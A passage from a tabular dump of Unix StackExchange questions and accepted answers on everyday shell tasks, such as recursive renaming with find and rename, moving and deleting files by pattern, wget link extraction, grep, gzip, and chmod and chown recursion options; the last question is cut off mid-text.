date int64 1,220B 1,719B | question_description stringlengths 28 29.9k | accepted_answer stringlengths 12 26.4k | question_title stringlengths 14 159 |
|---|---|---|---|
1,321,630,566,000 |
Prepend user-defined string to all files and folders recursively using find and rename.
I’d like to prepend “x “ (no quotes) to a directory and all of its contents down through all subdirectories. I’m a beginner using macOS Mojave 10.14.6 and Terminal. I downloaded rename using Homebrew for this purpose.
Example:
/Old Project
/Old Project/Abstract.rtf
/Old Project/Manuscript.docx
/Old Project/Data Analysis
/Old Project/Data Analysis/Working Syntax.sps
/Old Project/Data Analysis/Working Data.sav
/Old Project/Data Analysis/Cleaned Data.sav
/Old Project/Data Analysis/Figures
/Old Project/Data Analysis/Figures/Figure 1.png
/Old Project/Data Analysis/Figures/Figure 2.png
/Old Project/Data Analysis/Raw Data
/Old Project/Data Analysis/Raw Data/2020-06-26.csv
/Old Project/Ethics
/Old Project/Ethics/Application.pdf
/Old Project/Ethics/Approval.pdf
/Old Project/Ethics/Informed Consent.docx
Desired Result:
/x Old Project
/x Old Project/x Abstract.rtf
/x Old Project/x Manuscript.docx
/x Old Project/x Data Analysis
/x Old Project/x Data Analysis/x Working Syntax.sps
/x Old Project/x Data Analysis/x Working Data.sav
/x Old Project/x Data Analysis/x Cleaned Data.sav
/x Old Project/x Data Analysis/x Figures
/x Old Project/x Data Analysis/x Figures/x Figure 1.png
/x Old Project/x Data Analysis/x Figures/x Figure 2.png
/x Old Project/x Data Analysis/x Raw Data
/x Old Project/x Data Analysis/x Raw Data/x 2020-06-26.csv
/x Old Project/x Ethics
/x Old Project/x Ethics/x Application.pdf
/x Old Project/x Ethics/x Approval.pdf
/x Old Project/x Ethics/x Informed Consent.docx
What I Have So Far:
find . -depth (-execdir OR -exec) rename -n ’s/^/x /‘ {} +
find . List all files and directories recursively within the current working directory. Will output a list of filenames that include the path.
-depth Directs find to start at the lowest depth (at the bottom of the subdirectories) so you don’t run into the problem whereby an un-renamed file in a renamed directory cannot be found because that path no longer exists. (How do I get this find and rename command to work with subdirectories?)
-exec Find will execute the named command (rename) on each item in the list.
-execdir Find will execute the named command (rename) on each item in the list, with one difference - it will first enter each subdirectory then pass only the filename to the rename command (no path).
rename Rename command that uses Perl regular expressions. It cannot handle recursive file renaming on its own, which is why it needs find. Apparently it is a standard command on some systems while there’s another rename command that is standard on other systems, leading to some confusion.
-n Directs rename to show what will happen and not actually run it.
’s///‘ Tells rename to do a substitution, with the first section replaced by the second section. In my syntax (’s/^/x /‘) to replace ^ (marker for the beginning of the filename) with x .
{} Directs rename to the list of files from find.
+ Tells find the command is over.
-exec versus -execdir
-exec passes along the full file path. Rename acts upon the full file path as outlined in the documentation for rename and in the answer to a similar question:
“Note that rename will then operate on the entire path, not just the filename.” (http://plasmasturm.org/code/rename/)
“Temporary note: there is something wrong - the rename pattern does not handle filenames with >path; I'm working on a fix” (https://unix.stackexchange.com/a/153489)
So, if I use -exec, then I would get "x /Old Project/Data Analysis/Figures/Figure 1.png" instead of "/Old Project/Data Analysis/Figures/x Figure 1.png", for example. To solve this, I believe I would have to write a complex regular expression to somehow capture just the filename portion as outlined in this answer to a similar question:
“If you only want to modify the last component, you can anchor your regexp at (\A|?<=/), and make sure that it doesn't match any / and only matches at the last /.” (https://unix.stackexchange.com/a/166886)
I tried the regular expression given in this answer, but it resulted in an error (“Quantier follows nothing in regex…”) and I’m not actually sure it is for my version of rename.
execdir passes along the only the file name, which is promising. In fact, when I dry run the command, all the planned changes look perfect. However, the actual result is not - it renames files and folders in the main directory but fails to find all other files and folders. It says that they do not exist.
I eventually found this answer:
“find -execdir | rename
This would be the best way to do it if it weren't for the relative path madness, as it avoids Perl regex fu to only act on the basename:
PATH="$(echo "$PATH" | sed -E 's/(^|:)[^\/][^:]*//g')" \
find a -depth -execdir rename 's/(.*)/\L$1/' '{}' \;
-execdir first cds into the directory before executing only on the basename.
Unfortunately, I can't get rid of that PATH hacking part, find -execdir refuses to do anything if you have a relative path in PATH…” (Lowercasing all directories under a directory)
So, as I understand it, the command works in theory, which is why it works in the dry run, but, in practice, find refuses to actually go into each subdirectory for the rename command.
My Questions:
For using exec: Is there a way to isolate the filename from the full file path for rename?
For using execdir: Is there a way to ask find to use or to get absolute path names?
Notes
I'm very new to programming.
I found this very thorough answer (https://stackoverflow.com/a/54163971/13821837) but the syntax doesn't match what works for my system.
|
Using gnu tools:
First install GNU find via
brew install findutils
Then:
gfind . -depth -exec rename -n 's@(?<=/)[\s\w\.-]+$@x $&@' {} \;
With perl rename.
Remove -n switch when the output looks good.
Note
-depth here is very important, it traverse first files from directories before renaming directories themselves. (descending order, mandatory here).
the -n from renamestands for dry-run
Check regex explanations.
The replacement part x $& means a literal x + space and the last full match from the left of the substitution s///
Local test:
./Old Project
./Old Project/Manuscript.docx
./Old Project/Data Analysis
./Old Project/Data Analysis/Working Syntax.sps
./Old Project/Data Analysis/Raw data
./Old Project/Data Analysis/Working Data.sav
./Old Project/Data Analysis/Figures
./Old Project/Data Analysis/Figures/Figure 2.png
./Old Project/Data Analysis/Figures/Figure 1.png
./Old Project/Data Analysis/Raw Data
./Old Project/Data Analysis/Raw Data/2020-06-26.csv
./Old Project/Data Analysis/Cleaned Data.sav
./Old Project/Ethics
./Old Project/Ethics/Informed Consent.docx
./Old Project/Ethics/Application.pdf
./Old Project/Ethics/Approval.pdf
./Old Project/Abstract.rtf
After processing:
./x Old Project
./x Old Project/x Manuscript.docx
./x Old Project/x Data Analysis
./x Old Project/x Data Analysis/x Cleaned Data.sav
./x Old Project/x Data Analysis/x Figures
./x Old Project/x Data Analysis/x Figures/x Figure 2.png
./x Old Project/x Data Analysis/x Figures/x Figure 1.png
./x Old Project/x Data Analysis/x Raw Data
./x Old Project/x Data Analysis/x Raw Data/x 2020-06-26.csv
./x Old Project/x Data Analysis/x Raw data
./x Old Project/x Data Analysis/x Working Data.sav
./x Old Project/x Data Analysis/x Working Syntax.sps
./x Old Project/x Ethics
./x Old Project/x Ethics/x Application.pdf
./x Old Project/x Ethics/x Approval.pdf
./x Old Project/x Ethics/x Informed Consent.docx
./x Old Project/x Abstract.rtf
| Prepend user-defined string to all files and folders recursively using find and rename |
1,321,630,566,000 |
So wget has an ability to recursively download files, however it does it one file at a time.
I would like to pass in a directory URL, and for each URL it encounters in the recursion for it to spawn off a downloading process.
One way I was thinking to do this is to somehow use wget to print out the URLs it encounters, and then feeding those URLs into separate instances of wget (via wget URL_1 &, wget URL_2 & etc).
Any ideas?
|
I've been ruminating on this, and I'm not convinced wget is the best tool for the job here.
Here is how I would do this in the year 2022, using a tool like pup that is specifically designed to parse HTML (in pup's case, with CSS selectors):
wget -q -O- https://ubuntu.com/download/alternative-downloads \
| pup 'a[href$=".torrent"] attr{href}' \
| aria2c -d ~/Downloads -i -
See also
xidel
the -e / --extract option uses XPath selectors by default; supports CSS selectors with --css '<selector>' or --extract 'css("<selector>")'
can fetch internet resources directly—a bit slower than curl on my machine, though
very tolerant parser; almost never seen it complain, even for malformed HTML
examples:
xidel https://www.videlibri.de/xidel.html \
-e '//a[ends-with(@href,"/download")]/@href'
# faster, for some reason; don't forget the '-' (read from stdin)!
curl -q https://www.videlibri.de/xidel.html \
| xidel -e '//a[ends-with(@href,"/download")]/@href' -
# same as above, using CSS selectors + XPath for the attribute
curl -q https://www.videlibri.de/xidel.html \
| xidel -e 'css("a[href$=/download]")/@href' -
xmlstarlet
uses XPath selectors
must have well-formed XML/XHTML as input
piping through xmlstarlet fo -H -R (reformat, expect input as HTML, try to Recover after errors) should fix for most web sites
example:
# NB: my version of xmlstarlet doesn't support XPath 'ends-with'
curl -s https://ubuntu.com/download/alternative-downloads \
| xmlstarlet fo -H -R 2>/dev/null \
| xmlstarlet sel -t -v '//a[contains(@href, ".torrent")]/@href' -n
aria2
| How can I use wget to create a list of URLs from an index.html? |
1,321,630,566,000 |
I'm trying to create a graph of the distribution of file sizes on my ext4 system. I'm trying to write a script to scrape this information from my computer somehow. I don't care where the files are stored in the directory structure, only how much space each takes up. I know file sizes are stored in the inode metadata, and it seems like it might be pretty fast to read through the inode table, if such a thing exists. Does anyone know of a C API for accessing the size of files, or reading directly from the inode table? Does anyone know where the inode table is stored?
|
If you want a C API, you're going to end up with GNU nftw, the GNU file tree walk. DON'T fool yourself into using plain old ftw, you will get inaccurate data. You'll need to write a "per file" function that uses the struct stat that nftw passes into the "per file" function. You can have the "per file" function put file sizes in buckets, or just print out the file size, and then put the numbers in buckets some other way.
| Fastest way to get list of all file sizes |
1,322,691,968,000 |
I was told by my friend that one can work with -r switch to find files recursively in directories and subdirectories.Please tell me the error in the given statement it does not work
find / -type f -r -name "abc.txt"
|
The reason it doesn't work is because find has no -r option. While it is true that for many programs the -r flag means 'recursive', this is not the case for all and it is not the case for find. The job of find is to search for files and directories, it is not very often that you don't want it to be recursive.
You can check the options of most programs with the man command. For example, man find. Since the manual of find is huge, you might want to search it for the -r option:
$ man find | grep -w -- -r
The -- just tells grep to stop reading options, without it, the -r would be passed as an option to grep. Also, you can search within the man page by hitting / then writing what you want to search for, then enter.
That command returns nothing, compare it with this one which searches the manual of cp:
$ man cp | grep -w -- -r
-R, -r, --recursive
Since find is always recursive, what it does have is the inverse, a flag that lets you choose how many subdirectories it should descend into:
-maxdepth levels
Descend at most levels (a non-negative integer) levels of direc‐
tories below the command line arguments. -maxdepth 0
means only apply the tests and actions to the command line
arguments.
-mindepth levels
Do not apply any tests or actions at levels less than levels (a
non-negative integer). -mindepth 1 means process all files
except the command line arguments.
So, whenever you have doubts about a command, read its man page because you never know what a particular option might do. For example:
$ man sort | grep -w -- -r
-r, --reverse
$ man mount | grep -w -- -r,
-r, --read-only
$ man awk | grep -A 8 -w -- -r
-r
--re-interval
Enable the use of interval expressions in regular expression
matching (see Regular Expressions, below). Interval expressions
were not traditionally available in the AWK language. The POSIX
standard added them, to make awk and egrep consistent with each
other. They are enabled by default, but this option remains for
use with --traditional.
$ man sed | grep -w -- -r
-r, --regexp-extended
$ man xterm | grep -w -- -r
-r This option indicates that reverse video should be simulated by
swapping the foreground and background colors.
You get the idea.
| find command in linux |
1,322,691,968,000 |
I wrote the following script for finding the number of pdf and tex files from the current directory, including the subdirectories and hidden files. The following code is able to find the number of pdf files upto 2 levels of subdirectories below, but after that it tells that there are no sub directories....
#!/bin/bash
touch t.txt
k=`find -type d |wc -l`
k1=`expr $k - 1`
echo $k1
message1="*.pdf *.tex"
count=`ls -al $message1|wc -l`
find -type d > t.txt
i=2
while [ $i -le $k ]
do
kd=`head -$i t.txt|tail -1`
echo $kd
touch $kd/t.txt
cp t.txt $kd/t.txt
i=`expr $i + 1`
done
i=2
while [ $i -le $k ]
do
nd=`head -$i t.txt|tail -1`
set -x
echo $nd
set +x
cd $nd
j=`ls -al $message1|wc -l`
count=`expr $count + $j`
i=`expr $i + 1`
done
#set +x
echo $count
|
find works fine to me:
$ find . -name '*.pdf' -o -name '*.tex' | wc -l
75
$ find . -name '*.pdf' | wc -l
16
$ find . -name '*.tex' | wc -l
59
$ echo $((16+59))
75
Edit:
To handle special case: newline in filename
$ find . \( -name '*.pdf' -o -name '*.tex' \) -printf x | wc -c
| Script to count files matching a pattern in subdirectories |
1,322,691,968,000 |
Possible Duplicate:
Searching for string in files
Suppose I have a directory called Home and it is my current directory.
And in this home directory I have many other directories
directory1, directory2, etc.
How do I do a grep to find the occurrence of a word (say "AXN") in any of the files in all of these subdirectories (and their subdirectories?)
|
You can use something like:
grep -r "AXN" .
Use -ir if you want it to be case-insensitive.
| How to search all subdirectories and their subdirectories for the occurence of a word using grep? [duplicate] |
1,322,691,968,000 |
Think of it as going to the most high level folder, doing a Ctrl Find, and searching .DS_Store and deleting them all.
I want them all deleted, from all subfolders and subfolders subfolders and so on. Basically inside the top level folder, there should be no .DS_Store file anywhere, not even in any of its subfolders.
What would be the command I should enter?
|
find top-folder -type f -name '.DS_Store' -exec rm -f {} +
or, more simply,
find top-folder -type f -name '.DS_Store' -delete
where top-folder is the path to the top folder you'd like to look under.
To print out the paths of the found files before they get deleted:
find top-folder -type f -name '.DS_Store' -print -exec rm -f {} +
| How to remove all occurrences of .DS_Store in a folder |
1,322,691,968,000 |
I'm new to the gzip command, so I googled some commands to run so I can gzip an entire directory recursively. Now while it did that, it converted each of my files to the gzip format and added .gz to the end of each of their filenames.. is there a way to ungzip them all, one by one?
|
There are essentially two options for going through the whole directory tree:
Either you can use find(1):
find . -name '*.gz' -exec gzip -d "{}" \;
or if your shell has recursive globbing you could do something like:
for file in **/*.gz; do gzip -d "$file"; done
| I accidentally GZIPed a whole bunch of files, one by one, instead of using tar(1). How can I undo this mess? |
1,322,691,968,000 |
I have several directories through which I want to recursively iterate over and change the file name of
*.GEOT14246.*
to
*.GEOT15000.*
Is there a one liner on the bash script to do this or do I have to the write a script with a for loop. My try (which doesn't work) is below:
#!/bin/bash
for file in `find . -type f -name "*.GEOT14246.*"`
do
echo "file = $file"
mv $file *.GEOT15000.*
done
I then call with:
cd /path/to/script/
sh ./script1.sh /path/to/starting/dir
Obviously this doesn't work because I don't think I'm passing the starting directory path as an argument. I'm very new to Unix, so how can I pass arguments to it to say from which directory it should start searching and how do I get the script to work?
|
This should work:
find . -type f -name "*.GEOT14246.*" -print0 | \
xargs -0 rename 's/GEOT14246/GEOT15000/'
given there is not directories named *.GEOT14246.*
A bash variant using find could be something like:
while IFS= read -r -d $'\0' file; do
printf "MV: %-40s => %s\n" "$file" "${file/GEOT14246/GEOT15000}"
mv "$file" "${file/GEOT14246/GEOT15000}"
done < <(find . -type f -name "*.GEOT14246.*" -print0)
| |
+--- this is starting directory +--- This ensures no hiccup
if newline etc. in name
Relative, but full, paths are passed from find – which you should see from the
printf statement.
The new name is compiled by using bash:
${some_variable/find/replace}
to replace all find's use:
${some_variable//find/replace}
etc. More here. This could also be a good read: BashPitfalls, UsingFind.
Read some guides like BashGuide. Find some tutorials on-line, but usually never trust them, ask here or on irc.freenode.net #bash.
You do not need to invoke the script by calling sh. That would also call Bourne shell (sh) and not Bourne Again shell (bash). If you intend to run it with bash; issue bash file. .sh extension is also out of place.
What you normally do is make the file executable by:
chmod +x script_file
and then run it with:
./script_file
The shebang takes care of what environment the script should run in.
In your script you do not use the passed path-name anywhere. The script has
a "argument list" starting from $0 which is the script name, $1 first argument, $2 second, - and so on.
In your script you would do something in the direction of:
# Check if argument 1 is a directory, if not exit with error
if ! [[ -d "$1" ]]; then
printf "Usage: %s [PATH]\n" "$(basename "$0")" >&2
exit 1
fi
# OK
path="$1"
while ...
done < <(find "$path" -type f ...)
Your current mv statement would move all files to wherever you issue the command – to one file named .GEOT14246. (as in overwrite for each mv statement):
Before script run:
$ tree
.
└── d1
├── a1
│ ├── a2
│ │ ├── a3
│ │ │ └── foo.GEOT14246.faa
│ │ └── foo.GEOT14246.faa
│ └── foo.GEOT14246.faa
└── b1
├── b2
│ ├── b3
│ │ └── foo.GEOT14246.faa
│ └── foo.GEOT14246.faa
└── foo.GEOT14246.faa
After script run:
$ tree
.
├── d1
│ ├── a1
│ │ └── a2
│ │ └── a3
│ └── b1
│ └── b2
│ └── b3
└── *.GEOT15000.*
Also files / paths with spaces or other funny things would make the script go bad and spread havoc. Therefor you have to quote your variables (such as "$file").
| How to rename pattern in one file to another over several directories recursively |
1,322,691,968,000 |
Suppose I have a directory structure like this:
projects/
project1/
src/
node_modules/
dir1/
dir2/
dir3/
file
project2/
node_modules/
dir4/
Starting from projects/ I want to delete the contents of all node_modules/ directories, but I do not want to delete the node_modules/ itself, leaving it empty, without folders or files inside.
In the example above the items dir1, dir2, dir3, file and dir4 would be deleted.
|
The following will delete all files and directories within a path matching node_modules:
find . -path '*/node_modules/*' -delete
If you would like to check what will be deleted first, then omit the -delete action.
| How to recursively delete the contents of all "node_modules" directories (or any dir), starting from current directory, leaving an empty folder? |
1,322,691,968,000 |
I have made a mistake and dumped files together into the same directory. Luckily I can sort them based on the filename:
'''
2019-02-19 20.18.58.ndpi_2_2688_2240.jpg
'''
Where the # bit or 2 in this specific case is the location information, as it were. The range is 0-9 and the filenames are all identical length so that number will always be in the same position of the filename (26th character inlucing spaces, flanked by underscores). I found this great link:
command to find files by searching only part of their names?
However, I can't pipe the output into the move command. I tried to loop the output into a variable but that didn't seem to work either:
for f in find . -name '*_0_*' ; do mv "$f" /destination/directory ; done
Based on this link, I might have put the * or some quotes in the wrong place: mv: cannot stat No such file or directory in shell script.
That said, I have many directories and I would like to sort them in to an identical directory structure somewhere else:
-Flowers (to be sorted) -Flowers-buds -Flowers-stems
-Roses -Roses -Roses
buds.jpg ===> buds.jpg ===> stems.jpg
stems.jpg
petals.jpg
-Daisies -Daisies -Daisies
buds.jpgs buds.jpg stems.jpg
stems.jpg
petals.jpg
-Tulips -Tulips -Tulip
buds.jpgs buds.jpg stems.jpg
stems.jpg
petals.jpg
...and more based on that number (#). Is this something that's practical do in bash? I'm running MacOS in the terminal with coreutils installed so the tools should behave like GNU linux, instead of darwin (BSD).
|
The shell is splitting input on whitespace. You can use bash globbing with the recursive ** to get the filenames split properly:
shopt -s globstar
for f in **/*_0_*; do mv "$f" /dest/; done
If they're all going to the same place, the loop is not needed:
shopt -s globstar
mv **/*_0_* /dest/
... or use find -exec, which passes filenames directly from find to an exec() call, without the shell's involvement:
find . -name '*_0_*' -exec mv {} /dest/ \;
Or use read plus find -print0 to split on null. It's overkill for this problem, useful when globbing and find -exec aren't up to the task:
while IFS= read -r -d ''; do mv "$REPLY" /dest/; done < <( find . -name '*_0_*' -print0 )
To change the top-level destination based on the file name, as in your example, cut off pieces of the filename using ${var#remove_from_start} and ${var%remove_from_end}. Wildcards in the remove patterns will remove as little as possible; to remove as much as possible, double the operation character, as in ${…##…} or ${…%%…}:
shopt -s globstar
for f in **/*_0_*; do # Flowers/Roses/stems.jpg
file=${f##*/} # stems.jpg
base=${file%.*} # stems
path=${f%/*} # Flowers/Roses
toppath=${path%%/*} # Flowers
subpath=${path#*/} # Roses
dest=$toppath-$base/$subpath/ # Flowers-stems/Roses/
[[ -d $dest ]] || mkdir -p "$dest"
mv "$f" "$dest"
done
| Sort and mv files based on filename (with spaces), recursively |
1,322,691,968,000 |
I want to recursively delete all files that end with .in. This is taking a long time, and I have many cores available, so I would like to parallelize this process. From this thread, it looks like it's possible to use xargs or make to parallelize find. Is this application of find possible to parallelize?
Here is my current serial command:
find . -name "*.in" -type f -delete
|
Replacing -delete with -print (which is the default) and piping
into GNU parallel should mostly do it:
find . -name '*.in' -type f | parallel rm --
This will run one job per core; use -j N to use N parallel jobs
instead.
It's not completely obvious that this will run much faster than
deleting in sequence, since deleting is probably more I/O- than
CPU-bound, but it would be interesting to test out.
(I said "mostly do it" because the two commands are not fully
equivalent; for example, the parallel version will not do the right
thing if some of your input paths include newline characters.)
| Parallelize recursive deletion with find |
1,322,691,968,000 |
I think its a simple question, but the answer is probably a little more complicated :P
Edit: Actually, its not complicated at all!^^
So I have a directory with multiple svn projects and I would like to search through all recent files (in trunk folder) by content in all projects.
Here is somewhat the folders look like:
Projects
|
->Project1
| |
| ->tags
| |
| ->trunk
|
->Project2
| |
| ->tags
| |
| ->trunk
...
|
As suggested in comments above:
grep -l some-pattern ./Projects/*/trunk/*
or recursively if there are subdirs under each trunk (and your grep supports -r):
grep -lr some-pattern ./Projects/*/trunk/
| Search for files by content only in trunk subdirectories |
1,322,691,968,000 |
Situation
I have a file where each line has an IP address and I want to see if these Ip's are found in access.log
File name: IpAddressess
Contents example :
192.168.0.1
192.168.0.2
192.168.1.5
etc etc
Now I want to scan access.log for these IP addresses contained in the file IpAddressess
Can I use the command grep for this and what would the command structure look like?
Thank you kindly for any assistance!
|
You are looking for the -f option, described in man grep on my Arch Linux system as:
-f FILE, --file=FILE
Obtain patterns from FILE, one per line. If this option is
used multiple times or is combined with the -e (--regexp)
option, search for all patterns given. The empty file contains
zero patterns, and therefore matches nothing.
However, since grep works with regular expressions and . in regular expressions means "any character", you will also want the -F option, so that 1.2.3 doesn't match things like 10293:
-F, --fixed-strings
Interpret PATTERNS as fixed strings, not regular expressions.
Putting the two together, the command you're looking for is:
grep -Ff IpAddressess access.log
| How to provide grep a file with ip addresses to look for in access.log |
1,322,691,968,000 |
I'm trying to recursively delete a directory with rm -rf, but this fails because some inner directories don't have the w permission set. I know how to fix this with chmod. However, this requires to iterate over the whole directory twice, which can be slow.
Is there a way to remove such a directory in one go? (Assuming you have enough permissions to give yourself enough permissions)
sudo is not an option (limited user on pc in question).
|
rsync with an empty dummy directory seems fine:
mkdir empty; rsync -r --delete empty/ targetdir/; rmdir empty targetdir
With a 10x repeated test on a simple example, this took 10-14s (14 was an outlier, all others took 10 or 11s),
vs. chmod -R u+w targetdir && rm -rf targetdir, which took 19-25s
and find targetdir -type d -exec chmod 755 {} \; && rm -rf targetdir, which took 12-16s but will likely deteriorate more than rsync with more complex folder structures.
| rm -rf with missing w permissions on directories without root or chmod |
1,322,691,968,000 |
I have an TI DaVinci-based (ARM architecture kin to OMAP) system which netboots using TFTP and NFS-mounted root filesystem, and am trying to make it boot standalone without a netboot server.
The basic approach is to copy the kernel image to the NAND flash and the root filesystem to a connected SATA disk (NAND flash is nowhere near big enough for the whole system), then configure u-boot to load the kernel from NAND flash and pass an appropriate root= argument.
I'm stuck on the step of copying the filesystem. This question is relevant, but none of the recommendations work because I have only busybox versions of the cp and cpio tools, and the --one-file-system option is unsupported by busybox.
How can I clone the root filesystem when I only have the tool capabilities provided by busybox? Would it help to run archive creation commands on the NFS server (x64 architecture running Ubuntu) and then unpack on the target?
|
BusyBox's find supports the -xdev option, so you can make a cpio archive of the root filesystem that way. Unlike tar, cpio does not archive a directory's contents when it archives that directory.
find . -xdev | cpio -H newc -o |
{ cd /mnt && cpio -m -i; }
I don't quite understand why you're building the image from a device though. I'd expect to build a filesystem image using your build scripts on a development machine, and deploy that image.
| clone root directory tree using busybox |
1,322,691,968,000 |
I use this command to make a montage of all the images in a directory:
gmic *jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
I want to run this command in a directory and its subdirectories recursively. So in each directory I would create a montage of the images in that directory.
I tried:
find -exec gmic *jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
but it gave me the error
find: missing argument to `-exec'
I also tried
find -exec gmic -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg {} \;
which gave me the following error:
[gmic]-0./ Start G'MIC interpreter.
[gmic]-0./ Output image [] as file '-0000.Fri Mar 13 04:33:44 EDT 2015.jpg', with quality 100%.
[gmic]-0./ *** Error *** Command '-output': File '-0000.Fri Mar 13 04:33:44 EDT 2015.jpg', instance list (0,(nil)) is empty.
[gmic] *** Error in ./ *** Command '-output': File '-0000.Fri Mar 13 04:33:44 EDT 2015.jpg', instance list (0,(nil)) is empty.
|
Ok, so you want to run a command in each directory in a directory tree — the current directory, its subdirectories, their subdirectories, etc. The first thing to do is enumerate the directories in question. With the find command, tell it to list only directories:
find . -type d
The command you want to run in each directory is
gmic ./*jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
This is a shell command, containing a wildcard expansion and a command substitution. You need to run a shell to execute it. Since this shell will be told what to do by find, it isn't going to be the shell that you're running find in: you need to tell find to run a shell. Pass the directory where you want to act as an argument to the shell.
find . -type d -exec sh -c '…' {} \;
Before you can call gmic, you need to do a couple of things in that script: change to the directory in question, and check that it contains .jpg files.
find . -type d -exec sh -c '
cd "$0" || exit
set -- *.jpg
if [ -e "$1" ]; then
gmic "$@" -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
fi
' {} \;
Alternatively, you could tell find to list .jpg files. However that makes it difficult to execute the command only one per directory.
If your shell is bash, as opposed to plain sh, you can use its ** wildcard to recurse into directories. This is easier than using find. In bash ≤4.2, beware that ** traverses symbolic link to directories as well. You can simplify the file existence test a little as well.
shopt -s globstar nullglob
for dir in ./**/*/; do
files=("$dir/"*.jpg)
if [[ ${#files[@]} -ne 0 ]]; then
gmic "${files[@]}" -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o "$dir/-0000.$(date)".jpg
fi
done
In zsh, you can use a history modifier in a glob qualifier to enumerate directories containing .jpg files, then filter the resulting array to keep a single copy of each directory.
dirs=(./**/*.jpg(:h))
for dir in ${(u)dirs}; do
gmic $dir/*.jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o "$dir/-0000.$(date).jpg"
done
(Aside: -0000.Sat Mar 14 15:51:28 CET 2015.jpg is a really weird name for a file. Files whose name begins with - tend to cause problems because they look like options for commands. Dates are more convenient to manipulate in a format where sorting lexicographically is identical to sorting chronologically, such as 20150314-145128.)
| Run a command with wildcards in each subdirectory |
1,322,691,968,000 |
I am interested to know if a single command line that would allow me to recursively copy a folder to all of our NGINX Virtual Host htdocs folders:
I need to copy that folder to all hosts located in vhosts :
/var/www/vhosts/*/htdocs/
|
With all due respect, I don't think the above code/answer is correct.
if [ -d dir] is probably an attempt to if [[ -d "$dir" ]].. or [[ -d "$dir" ]];..
The following code should work and do what you want.
vhostdirs=( ./var/www/vhosts/* )
for dir in "$vhostdirs"
do
cp -r "folder_to_be_copied" "$dir/htdocs/"
done
Mind also the quotes " " around the variables which are essential for the white spaces in directory names to be preserved.
| Copy a folder and its content to all Nginx vhosts host |
1,322,691,968,000 |
The Issue
I was using python-skydrive to download files to my PC, and I accidentally corrupted a good amount of my PDF files. When I try to view them in Document Viewer, I get the following error message:
File type plain text document (text/plain) is not supported
$file ny.pdf
$ny.pdf
My Request
I'm looking for a command line tool or snippet that will allow me to recursively find PDF files in a folder and its subfolders, and then move corrupted files to a designated folder.
I'm using Ubuntu 13.10 on an x64 PC.
|
After investigation (see the comments in the question), it appeared that the "corrupted" files were in fact empty. This can happen when a downloading program create the entries in the filesystem but fails before having downloaded their content.
To look for them in the current directory and its subdirectories and move them to a directory called trash in your home directory for example, you can use the find command.
find . -name '*.pdf' -size 0 -exec mv -t ~/trash {} \+
| Recursively find and move corrupted PDFs |
1,322,691,968,000 |
I am having to do chmod -R 755 some_dir where 'some_dir' contains '.git' folders. Is there any way I can exclude hidden files and folder when doing recursive chmod?
Note: chmoding .git folder is throwing the following error
some_dir/.git/objects/pack/pack-dd149b11c4e5d205e3022836d49a972684de8daa.idx': Operation not permitted
I don't really need to chmod .git folders but unfortunately I can't remove them also in my case.
|
Not with chmod alone. You'll need to use find:
find some_dir -name '.?*' -prune -o -exec chmod 755 {} +
Or with zsh (or ksh93 -G, or with tcsh after set globstar) globbing:
chmod 755 -- some_dir some_dir/**/*
(you can also do that with fish or bash -O globstar, but beware that bash versions prior to 4.3 and fish follow symlinks when descending directories. It was partly fixed in bash 4.3 in that you'd still get the files in symlinks to directories but not anymore in subdirs of those as in 4.2, and fully fixed in 5.0)
Are you sure you want to make all the files executable though?
| How to exclude hidden files in recursive chmod? |
1,322,691,968,000 |
From the chown manpage:
The following options modify how a hierarchy is traversed when the -R option is also specified. If more than one is specified, only the final one takes effect.
-H if a command line argument is a symbolic link to a directory, traverse it
-L traverse every symbolic link to a directory encountered
-P do not traverse any symbolic links (default)
What is the exact difference between the -H and -L options? As I understood it, -H allows for directory symlink traversal only when that directory is specified as argument, where -L traverses all directory symlinks in any case.
(These options apply only when chowning recursively using the -R option. In non-recursive mode, a directory symlink specified as argument is always traversed.) Is this correct?
|
Your understanding is correct; these options match the same options in find.
Thus
chown -R .
or
chown -R -P .
changes the owner recursively without de-referencing any symlinks;
chown -R -H *
changes the owner recursively, de-referencing any symlinks in the current directory (since they end up being part of the arguments) but
chown -R -H .
still doesn't de-reference any symlink, and finally
chown -R -L .
chown -R -L *
both de-reference syminks.
(As an aside for the examples above, note that . and * don't necessarily result in the same outcome, depending on your shell's globbing options — * typically doesn't match dotfiles.)
| What is the difference between -H and -L options of chown? |
1,322,691,968,000 |
I have the following directory tree:
records/13/2014.12.16/00/05.mpg
records/13/2014.12.16/00/15.mpg
records/13/2014.12.16/01/05.mpg
records/13/2014.12.16/02/15.mpg
records/15/2014.12.14/05/25.mpg
etc.
I need to rename every file which has *5.mpg in its name to *0.mpg. So for example:
mv records/13/2014.12.16/00/05.mpg records/13/2014.12.16/00/00.mpg
mv records/13/2014.12.16/00/15.mpg records/13/2014.12.16/00/10.mpg
mv records/15/2014.12.14/05/25.mpg records/15/2014.12.14/05/20.mpg
etc.
I know that I'm gonna have to write a bash script to do that. Unfortunately I'm not good at it, that's why I'm asking you for help.
I guess that it will have to enter each directory (the recursive part) and move every file in that directory if its name contains *5.mpg.
|
Just loop through all *.5mpg files and use help of parameter expansion to change filenames:
for file in *5.mpg; do mv -- "$file" "${file%5.mpg}"0.mpg; done
To do it for different directories set globstar option (shopt -s globstar in bash) and additionally take path component with dirname command or again using parameter expansion.
| Moving files recursively if certain condition is met |
1,322,691,968,000 |
I'm trying to get a site with wget. The problem is that it:
Have user friendly name for the pages
http://domain/wiki/Section/Home,
http://domain/wiki/Section/Not+Home
http://domain/wiki/Section/Other+page
For some pages it uses query strings:
http://domain/wiki/Section/Home?one=value&other=value
and for some reason maybe backup some files have an extension of .1 (number from 1 - n) for example styles.css.1, javascrip.js.2
